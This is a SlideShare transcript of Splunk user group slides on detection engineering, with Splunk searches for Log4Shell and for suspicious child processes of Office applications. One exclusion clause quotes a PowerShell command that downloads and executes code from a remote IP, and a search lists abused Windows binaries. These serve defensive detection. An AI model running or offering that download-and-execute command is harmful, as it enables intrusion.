SlideShare uma empresa Scribd logo
1 de 30
Baixar para ler offline
© 2023 SPLUNK INC.
Splunk PNW
User Group
20 September, 2023
© 2023 SPLUNK INC.
Agenda
Topic Speaker Organization Time
Welcome
Lunch orders, get comfy
Intros and announcements
Amanda Richardson
Sr. Customer Success Manager
Splunk 20m
Demystifying Detection Engineering with Splunk and Anvilogic Andrew D’Auria
Sales Engineering Director
Anvilogic 30m
Edge Hub and AI Assist Dennis Morton
Principal Consultant
Arcus Data 30m
Open Discussion and Networking Time! User Community All 30m
Wrap up
Closing remarks, topic ideas
Rob de Luna
Sr. Solutions Engineer
Splunk 10m
© 2023 SPLUNK INC.
Thank you to today’s sponsor!
Many thanks to Anvilogic for
sponsoring today’s lunch
meeting!
...and thanks to Steeplejack Brewing for taking
great care of us!
Anvilogic
© 2023 SPLUNK INC.
What We Do
● Host 5-6 events per year
(in-person or hybrid)
● Engage with user group
members to understand what
they'd like to learn and
discuss
● Source speakers, venues,
and solicit ideas for user
group meetings
Become a Splunk User Group Leader
Benefits
● Leader-only event at the
Community Lounge at .conf
● Leader badge in your
community profile at
community.splunk.com
● Online forum for UG leaders
only, including a playbook,
speaker & topic ideas,
knowledge base
● Quarterly online events to
connect with other User
Group leaders globally
● Ongoing support from the
Splunk Community Team
Requirements
● Use Splunk (be a customer or
partner, not a Splunk
employee)
● Lead, support, and grow the
local Splunk Community
● Be motivated to make things
happen
● Get excited talking about
Splunk and provide a space
for others to share and learn
all things Splunky!
Portland or Seattle
Apply here!
© 2023 SPLUNK INC.
Andrew D’Auria
Sales Engineering Director | Anvilogic
Demystifying Detection Engineering with
Splunk and Anvilogic
Confidential
6
What is
Detection Engineering?
Threats to Detections in Minutes
Andrew D’Auria, SE Director
The Basics and Beyond
Confidential
Today’s
Agenda
- Definition & Evolution of DE
- Step by Step Walkthrough
- Afterthoughts
- Q & A
7
8
Definition & Evolution
Of Detection Engineering (DE)
Confidential
Detection Engineering - Working Definition:
9
Detection Engineering (DE) is the practice of:
- researching,
- building,
- testing,
- deploying,
- validating and
- maintaining
- rules, searches and methods of
- detecting adversarial or otherwise unwanted behaviors on
your computer systems.
Not the Webster’s definition
Confidential
Evolution - Typical vs. Ideal Detection
Using the “Pyramid of Pain”
10
Typical
● IOC Driven
● Very time limited
● Lack of Context
● Whack-a-mole
Ideal
● Tool & Behavior Driven
● Very hard for
adversaries to change
● Long term strategic
value for detections
Image Source: David Bianco’s blog - http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html
Great.
The Pyramid of Pain.
Duh.
Been trying to do that for awhile…
Alright… Let’s “flip” the pyramid
11
11
Effectively Flipping the Pyramid
Raw Events
Events of
Interest
Alerts
Threat Identifiers
(AKA, Traditional Alerts)
Threat Scenarios
(True TTP Detection)
12
12
Confidential
Threat Scenario
Entity ‘X' Entity ‘X' Entity ‘X'
+ +
Threat Identifier
Event ID = “1234”
AND
(Process Name = “XYZ”
OR
Process Name = “ABC”)
Events of Interest
Event of Interest “A”
AND (60 Minutes)
Event of Interest “B”
AND (5 hours)
Event of Interest “C”
Threat Identifiers >> EOI >> Threat Scenarios
13
Multi-stage Detections
13
14
Step-by-Step Walkthrough
Confidential
What Is Detection Engineering
Webster’s Dictionary Defines Detection Engineering As…
Query
Detection
Threat
Scenario
Visualization
Dashboard
Report
SIEM Content
• Everything Is A Query
• Use Case != SIEM Content
• This Is A Use Case
Business & Threat
Understanding
Data Understanding
15
15
The Goal of a Detection Engineer
In other words…
Confidential
Diving Even Deeper
Diving Even Deeper
Collect Detect Analyze Respond
Security Analytics Lifecycle
Evaluation
Modeling
Data Preparation
Data
Understanding
Business & Threat
Understanding
Research
• Gather
• Interpret
• Hypothesize
Develop
• Test
• Document
• Deploy
Maintain
• Update
• Tune
Evaluation
Deployment
16
DE as part of the Security Analytics Lifecycle
16
Confidential
Research
Data Preparation
Data
Understanding
Business & Threat
Understanding
Research
• Gather
• Interpret
• Hypothesize
• Which Threats Are Relevant To The
Business?
• What Is That Threat?
• How Does It Work?
• What Would It Look Like
For Us?
• What Data Points Can I Use To Identify
The Threat?
• Do We Have The Data In Our
Environment?
• Do We Have The Data In
Our SIEM?
• Is The Data Adequately Verbose?
• Is The Data Adequately Parsed?
17
Research
17
Confidential
Building and Testing
Modeling
Develop
• Test
• Document
• Deploy
• How Do I Translate My Hypothesis
Into a Query?
Deployment
• How Do I Deploy & Manage My
Detections At Scale In A Large And/Or
Distributed Environment?
Evaluation
• Does My Hypothesis Hold Up?
• Is It Accurate?
• Is It Precise?
• Is It Highly Actionable?
18
Develop
18
Confidential
A Hands-on Example
A Hands On Example
https://www.lunasec.io/docs/blog/log4j-zero-day/
https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
https://blog.qualys.com/vulnerabilities-threat-research/2021/12/14/log4shel
l-exploit-detection-and-response-with-qualys-multi-vector-edr
Web Traffic → String “jndi”
Process Monitoring → Parent Process “Java” + Child Process ”?”
"${jndi" OR (TERM(j) TERM(n) TERM(d) TERM(i)) OR "lower" OR "upper" OR
(TERM(jn) TERM(DI)) OR (TERM(J) TERM(ndi)) OR (TERM(jnd) TERM(i)) OR
TERM(jndi)
|regex _raw="(?i)${.*?j.*?n.*?d.*?i.*?:.*?://.*?}"
(TERM(EventCode=4688) OR "<EventID>4688<" OR Type=Process) "java.exe"
("powershell.exe" OR "cmd.exe" OR "AppInstaller.exe" OR "Bitsadmin.exe" OR
"CertOC.exe" OR "CertReq.exe" OR "cmdl32.exe" OR "Control.exe" OR
"Cscript.exe" OR "Desktopimgdownldr.exe" OR "Diantz.exe" OR "Esentutl.exe"
OR "Eventvwr.exe" OR "Expand.exe" OR "Extrac32.exe" OR "Findstr.exe" OR
"Finger.exe" OR "Ftp.exe" OR "GfxDownloadWrapper.exe" OR "Hh.exe" OR
"IMEWDBLD.exe" OR ... TRUNCATED
19
Research & Develop
19
Confidential
Maintain
• Update
• Tune
Evaluation
• Does My Hypothesis Still Hold Up?
• Is It Accurate?
• Is It Precise?
• Is It Highly Actionable?
Deployment
• How Do I Deploy & Manage My
Detections At Scale In A Large And/Or
Distributed Environment?
20
Maintain
20
Confidential
Example with Details
A Hands On Example
TERM("EventCode=4688") (TERM("powershell.exe") OR TERM("cmd.exe") OR TERM("wscript.exe") OR TERM("cscript.exe")) ((TERM(Microsoft) TERM(Office)) OR
TERM(WINWORD.EXE) OR TERM(EXCEL.EXE) OR TERM(POWERPNT.EXE) OR TERM(MSACCESS.EXE) OR TERM(OUTLOOK.EXE) OR TERM(VISIO.EXE) OR TERM(WINPROJ.EXE) OR TERM(pdf))
| regex "(?i)(Microsoft
Office)|(WINWORD.EXE)|(EXCEL.EXE)|(POWERPNT.EXE)|(MSACCESS.EXE)|(OUTLOOK.EXE)|(VISIO.EXE)|(WINPROJ.EXE)|(AcroRd32.exe)|(Acrobat.exe)|(FoxitPhantomPDF
.exe)|(FoxitReader.exe)"
Primary Fields of Interest:
• Parent Process
• Child Process
Secondary Fields of Interest:
• User
• Host
| stats count(avl_use_case_title) by parent_process_name,
process_name, process
| stats count(avl_use_case_title) by user
| stats count(avl_use_case_title) by host
`avl_get_anvilogic_data` source="avl:t*"
avl_use_case_title="Malicious Document Execution (Demo)"
process!="powershell.exe IEX ((new-object
net.webclient).downloadstring('http://154.33.121.14/readme.zip'))"
21
Maintain
21
22
Putting it all
together in a
“Scenario”
Confidential
Capability Capacity
Time/Resources
"I Don't Have Time"
Skills & Experience
"I Don't Know How"
Detection Engineering
Fundamental Challenges
Time/Resources
"I Don't Have Time"
Skills & Experience
"I Don't Know How"
Time/Resources
"I Don't Have Time"
Skills & Experience
"I Don't Know How"
Evaluation
Modeling
Data Preparation
Data
Understanding
Business & Threat
Understanding
Research
• Gather
• Interpret
• Hypothesize
Develop
• Test
• Document
• Deploy
Maintain
• Update
• Tune
Evaluation
Deployment
23
Fundamental Challenges
23
Detection is critical but expensive, slow, & manual
Analytic Layer
Logging Layer
● Highly manual
● FTEs for tuning and health
monitoring
● No versioning or validation
Detection Maintenance
● Tracking priorities is manual
● Hard to keep up with MITRE
● Difficult to identify gaps
● No way to track progress
Detection KPIs
24
● Mostly manual / many tools
● Threat intel is expensive
● Time to detect is slow
● Minimal correlation
Detection Engineering
● Expensive
● Difficult to maintain
● Vendor Lock in
Centralized Data Stores
● Need cost effective options
● Hybrid models brewing
● SOC has no access
More & more data…
Go from threats to detections in minutes
Immediate
value
Streamline your detection process
● Purple Team & Detection
Armory Service
● Detection lifecycle
management platform
Detection Engineering
Faster Deployment
● Tuning & Health Insights
● Remediation
recommendations
● Hunting Insights
Detection Co-Pilot
Automate Maintenance
● MITRE ATT&CK coverage
● Data feed coverage
● Improvement framework
Maturity Scoring
Continuously Assess
Bring Your Own Security Data Lake
25
andrew@anvilogic.com
26
Thank you
The Anvilogic Platform
27
© 2023 SPLUNK INC.
Dennis Morton
Principal Consultant | Arcus Data
Edge Hub and AI Assist Demo
© 2023 SPLUNK INC.
● Topic requests for next time?
● Apply to be a User Group leader
● Drop suggestions or offers to speak to the #pnw channel in the UG slack
Wrap up
© 2023 SPLUNK INC.
Thank You!

Mais conteúdo relacionado

Semelhante a Splunk September 2023 User Group PDX.pdf

Outpost24 webinar: Turning DevOps and security into DevSecOps
Outpost24 webinar: Turning DevOps and security into DevSecOpsOutpost24 webinar: Turning DevOps and security into DevSecOps
Outpost24 webinar: Turning DevOps and security into DevSecOpsOutpost24
 
RSA Conference APJ 2019 DevSecOps Days Security Chaos Engineering
RSA Conference APJ 2019 DevSecOps Days Security Chaos EngineeringRSA Conference APJ 2019 DevSecOps Days Security Chaos Engineering
RSA Conference APJ 2019 DevSecOps Days Security Chaos EngineeringAaron Rinehart
 
Secure Because Math: A Deep-Dive on Machine Learning-Based Monitoring (#Secur...
Secure Because Math: A Deep-Dive on Machine Learning-Based Monitoring (#Secur...Secure Because Math: A Deep-Dive on Machine Learning-Based Monitoring (#Secur...
Secure Because Math: A Deep-Dive on Machine Learning-Based Monitoring (#Secur...Alex Pinto
 
Scrum in dev ops teams - Presentation from Scrum Gathering Bangalore
Scrum in dev ops teams - Presentation from Scrum Gathering BangaloreScrum in dev ops teams - Presentation from Scrum Gathering Bangalore
Scrum in dev ops teams - Presentation from Scrum Gathering BangaloreMirco Hering
 
Fast and effective analysis of architecture diagrams
Fast and effective analysis of architecture diagrams Fast and effective analysis of architecture diagrams
Fast and effective analysis of architecture diagrams GlobalLogic Ukraine
 
Genomics data insights
Genomics data insightsGenomics data insights
Genomics data insightsVishwas N
 
2019 FRSecure CISSP Mentor Program: Class Ten
2019 FRSecure CISSP Mentor Program: Class Ten2019 FRSecure CISSP Mentor Program: Class Ten
2019 FRSecure CISSP Mentor Program: Class TenFRSecure
 
[DevSecOps Live] DevSecOps: Challenges and Opportunities
[DevSecOps Live] DevSecOps: Challenges and Opportunities[DevSecOps Live] DevSecOps: Challenges and Opportunities
[DevSecOps Live] DevSecOps: Challenges and OpportunitiesMohammed A. Imran
 
FRSecure 2018 CISSP Mentor Program Session 10
FRSecure 2018 CISSP Mentor Program Session 10FRSecure 2018 CISSP Mentor Program Session 10
FRSecure 2018 CISSP Mentor Program Session 10FRSecure
 
System Security on Cloud
System Security on CloudSystem Security on Cloud
System Security on CloudTu Pham
 
Threat Modeling All Day!
Threat Modeling All Day!Threat Modeling All Day!
Threat Modeling All Day!Steven Carlson
 
DevSecOps: The DoD Software Factory
DevSecOps: The DoD Software FactoryDevSecOps: The DoD Software Factory
DevSecOps: The DoD Software Factoryscoopnewsgroup
 
Bridging the Gap: Analyzing Data in and Below the Cloud
Bridging the Gap: Analyzing Data in and Below the CloudBridging the Gap: Analyzing Data in and Below the Cloud
Bridging the Gap: Analyzing Data in and Below the CloudInside Analysis
 
Machine Learning & IT Service Intelligence for the Enterprise: The Future is ...
Machine Learning & IT Service Intelligence for the Enterprise: The Future is ...Machine Learning & IT Service Intelligence for the Enterprise: The Future is ...
Machine Learning & IT Service Intelligence for the Enterprise: The Future is ...Precisely
 
The Unicorn Project and the Five Ideals.pdf
The Unicorn Project and the Five Ideals.pdfThe Unicorn Project and the Five Ideals.pdf
The Unicorn Project and the Five Ideals.pdfVMware Tanzu
 
Welcome to the Metrics
Welcome to the MetricsWelcome to the Metrics
Welcome to the MetricsVMware Tanzu
 
Building Your Application Security Data Hub - OWASP AppSecUSA
Building Your Application Security Data Hub - OWASP AppSecUSABuilding Your Application Security Data Hub - OWASP AppSecUSA
Building Your Application Security Data Hub - OWASP AppSecUSADenim Group
 
Indianapolis Splunk User Group Dec 22
Indianapolis Splunk User Group Dec 22Indianapolis Splunk User Group Dec 22
Indianapolis Splunk User Group Dec 22WesComer2
 
SF Bay Area Splunk User Group Meeting October 5, 2022
SF Bay Area Splunk User Group Meeting October 5, 2022SF Bay Area Splunk User Group Meeting October 5, 2022
SF Bay Area Splunk User Group Meeting October 5, 2022Becky Burwell
 

Semelhante a Splunk September 2023 User Group PDX.pdf (20)

Outpost24 webinar: Turning DevOps and security into DevSecOps
Outpost24 webinar: Turning DevOps and security into DevSecOpsOutpost24 webinar: Turning DevOps and security into DevSecOps
Outpost24 webinar: Turning DevOps and security into DevSecOps
 
RSA Conference APJ 2019 DevSecOps Days Security Chaos Engineering
RSA Conference APJ 2019 DevSecOps Days Security Chaos EngineeringRSA Conference APJ 2019 DevSecOps Days Security Chaos Engineering
RSA Conference APJ 2019 DevSecOps Days Security Chaos Engineering
 
Secure Because Math: A Deep-Dive on Machine Learning-Based Monitoring (#Secur...
Secure Because Math: A Deep-Dive on Machine Learning-Based Monitoring (#Secur...Secure Because Math: A Deep-Dive on Machine Learning-Based Monitoring (#Secur...
Secure Because Math: A Deep-Dive on Machine Learning-Based Monitoring (#Secur...
 
Scrum in dev ops teams - Presentation from Scrum Gathering Bangalore
Scrum in dev ops teams - Presentation from Scrum Gathering BangaloreScrum in dev ops teams - Presentation from Scrum Gathering Bangalore
Scrum in dev ops teams - Presentation from Scrum Gathering Bangalore
 
Fast and effective analysis of architecture diagrams
Fast and effective analysis of architecture diagrams Fast and effective analysis of architecture diagrams
Fast and effective analysis of architecture diagrams
 
Genomics data insights
Genomics data insightsGenomics data insights
Genomics data insights
 
SDLC & DevSecOps
SDLC & DevSecOpsSDLC & DevSecOps
SDLC & DevSecOps
 
2019 FRSecure CISSP Mentor Program: Class Ten
2019 FRSecure CISSP Mentor Program: Class Ten2019 FRSecure CISSP Mentor Program: Class Ten
2019 FRSecure CISSP Mentor Program: Class Ten
 
[DevSecOps Live] DevSecOps: Challenges and Opportunities
[DevSecOps Live] DevSecOps: Challenges and Opportunities[DevSecOps Live] DevSecOps: Challenges and Opportunities
[DevSecOps Live] DevSecOps: Challenges and Opportunities
 
FRSecure 2018 CISSP Mentor Program Session 10
FRSecure 2018 CISSP Mentor Program Session 10FRSecure 2018 CISSP Mentor Program Session 10
FRSecure 2018 CISSP Mentor Program Session 10
 
System Security on Cloud
System Security on CloudSystem Security on Cloud
System Security on Cloud
 
Threat Modeling All Day!
Threat Modeling All Day!Threat Modeling All Day!
Threat Modeling All Day!
 
DevSecOps: The DoD Software Factory
DevSecOps: The DoD Software FactoryDevSecOps: The DoD Software Factory
DevSecOps: The DoD Software Factory
 
Bridging the Gap: Analyzing Data in and Below the Cloud
Bridging the Gap: Analyzing Data in and Below the CloudBridging the Gap: Analyzing Data in and Below the Cloud
Bridging the Gap: Analyzing Data in and Below the Cloud
 
Machine Learning & IT Service Intelligence for the Enterprise: The Future is ...
Machine Learning & IT Service Intelligence for the Enterprise: The Future is ...Machine Learning & IT Service Intelligence for the Enterprise: The Future is ...
Machine Learning & IT Service Intelligence for the Enterprise: The Future is ...
 
The Unicorn Project and the Five Ideals.pdf
The Unicorn Project and the Five Ideals.pdfThe Unicorn Project and the Five Ideals.pdf
The Unicorn Project and the Five Ideals.pdf
 
Welcome to the Metrics
Welcome to the MetricsWelcome to the Metrics
Welcome to the Metrics
 
Building Your Application Security Data Hub - OWASP AppSecUSA
Building Your Application Security Data Hub - OWASP AppSecUSABuilding Your Application Security Data Hub - OWASP AppSecUSA
Building Your Application Security Data Hub - OWASP AppSecUSA
 
Indianapolis Splunk User Group Dec 22
Indianapolis Splunk User Group Dec 22Indianapolis Splunk User Group Dec 22
Indianapolis Splunk User Group Dec 22
 
SF Bay Area Splunk User Group Meeting October 5, 2022
SF Bay Area Splunk User Group Meeting October 5, 2022SF Bay Area Splunk User Group Meeting October 5, 2022
SF Bay Area Splunk User Group Meeting October 5, 2022
 

Mais de Amanda Richardson

Splunk PNW User Group - Seattle - 2023-06-28.pdf
Splunk PNW User Group - Seattle - 2023-06-28.pdfSplunk PNW User Group - Seattle - 2023-06-28.pdf
Splunk PNW User Group - Seattle - 2023-06-28.pdfAmanda Richardson
 
2022 09 March Splunk PNW User Group
2022 09 March Splunk PNW User Group 2022 09 March Splunk PNW User Group
2022 09 March Splunk PNW User Group Amanda Richardson
 
November 2021 Splunk PNW User Group
November 2021 Splunk PNW User GroupNovember 2021 Splunk PNW User Group
November 2021 Splunk PNW User GroupAmanda Richardson
 
July 2021 Virtual PNW Splunk User Group Slides
July 2021 Virtual PNW Splunk User Group SlidesJuly 2021 Virtual PNW Splunk User Group Slides
July 2021 Virtual PNW Splunk User Group SlidesAmanda Richardson
 
Portland Splunk User Group May 2020
Portland Splunk User Group May 2020 Portland Splunk User Group May 2020
Portland Splunk User Group May 2020 Amanda Richardson
 

Mais de Amanda Richardson (6)

Splunk PNW User Group - Seattle - 2023-06-28.pdf
Splunk PNW User Group - Seattle - 2023-06-28.pdfSplunk PNW User Group - Seattle - 2023-06-28.pdf
Splunk PNW User Group - Seattle - 2023-06-28.pdf
 
March 2023 PNW User Group
March 2023 PNW User GroupMarch 2023 PNW User Group
March 2023 PNW User Group
 
2022 09 March Splunk PNW User Group
2022 09 March Splunk PNW User Group 2022 09 March Splunk PNW User Group
2022 09 March Splunk PNW User Group
 
November 2021 Splunk PNW User Group
November 2021 Splunk PNW User GroupNovember 2021 Splunk PNW User Group
November 2021 Splunk PNW User Group
 
July 2021 Virtual PNW Splunk User Group Slides
July 2021 Virtual PNW Splunk User Group SlidesJuly 2021 Virtual PNW Splunk User Group Slides
July 2021 Virtual PNW Splunk User Group Slides
 
Portland Splunk User Group May 2020
Portland Splunk User Group May 2020 Portland Splunk User Group May 2020
Portland Splunk User Group May 2020
 

Último

My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentationphoebematthew05
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April  Automation LPDGAPIForce Zurich 5 April  Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 

Último (20)

My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentation
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April  Automation LPDGAPIForce Zurich 5 April  Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 

Splunk September 2023 User Group PDX.pdf

  • 1. © 2023 SPLUNK INC. Splunk PNW User Group 20 September, 2023
  • 2. © 2023 SPLUNK INC. Agenda Topic Speaker Organization Time Welcome Lunch orders, get comfy Intros and announcements Amanda Richardson Sr. Customer Success Manager Splunk 20m Demystifying Detection Engineering with Splunk and Anvilogic Andrew D’Auria Sales Engineering Director Anvilogic 30m Edge Hub and AI Assist Dennis Morton Principal Consultant Arcus Data 30m Open Discussion and Networking Time! User Community All 30m Wrap up Closing remarks, topic ideas Rob de Luna Sr. Solutions Engineer Splunk 10m
  • 3. © 2023 SPLUNK INC. Thank you to today’s sponsor! Many thanks to Anvilogic for sponsoring today’s lunch meeting! ...and thanks to Steeplejack Brewing for taking great care of us! Anvilogic
  • 4. © 2023 SPLUNK INC. What We Do ● Host 5-6 events per year (in-person or hybrid) ● Engage with user group members to understand what they'd like to learn and discuss ● Source speakers, venues, and solicit ideas for user group meetings Become a Splunk User Group Leader Benefits ● Leader-only event at the Community Lounge at .conf ● Leader badge in your community profile at community.splunk.com ● Online forum for UG leaders only, including a playbook, speaker & topic ideas, knowledge base ● Quarterly online events to connect with other User Group leaders globally ● Ongoing support from the Splunk Community Team Requirements ● Use Splunk (be a customer or partner, not a Splunk employee) ● Lead, support, and grow the local Splunk Community ● Be motivated to make things happen ● Get excited talking about Splunk and provide a space for others to share and learn all things Splunky! Portland or Seattle Apply here!
  • 5. © 2023 SPLUNK INC. Andrew D’Auria Sales Engineering Director | Anvilogic Demystifying Detection Engineering with Splunk and Anvilogic
  • 6. Confidential 6 What is Detection Engineering? Threats to Detections in Minutes Andrew D’Auria, SE Director The Basics and Beyond
  • 7. Confidential Today’s Agenda - Definition & Evolution of DE - Step by Step Walkthrough - Afterthoughts - Q & A 7
  • 8. 8 Definition & Evolution Of Detection Engineering (DE)
  • 9. Confidential Detection Engineering - Working Definition: 9 Detection Engineering (DE) is the practice of: - researching, - building, - testing, - deploying, - validating and - maintaining - rules, searches and methods of - detecting adversarial or otherwise unwanted behaviors on your computer systems. Not the Webster’s definition
  • 10. Confidential Evolution - Typical vs. Ideal Detection Using the “Pyramid of Pain” 10 Typical ● IOC Driven ● Very time limited ● Lack of Context ● Whack-a-mole Ideal ● Tool & Behavior Driven ● Very hard for adversaries to change ● Long term strategic value for detections Image Source: David Bianco’s blog - http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html
  • 11. Great. The Pyramid of Pain. Duh. Been trying to do that for awhile… Alright… Let’s “flip” the pyramid 11 11
  • 12. Effectively Flipping the Pyramid Raw Events Events of Interest Alerts Threat Identifiers (AKA, Traditional Alerts) Threat Scenarios (True TTP Detection) 12 12
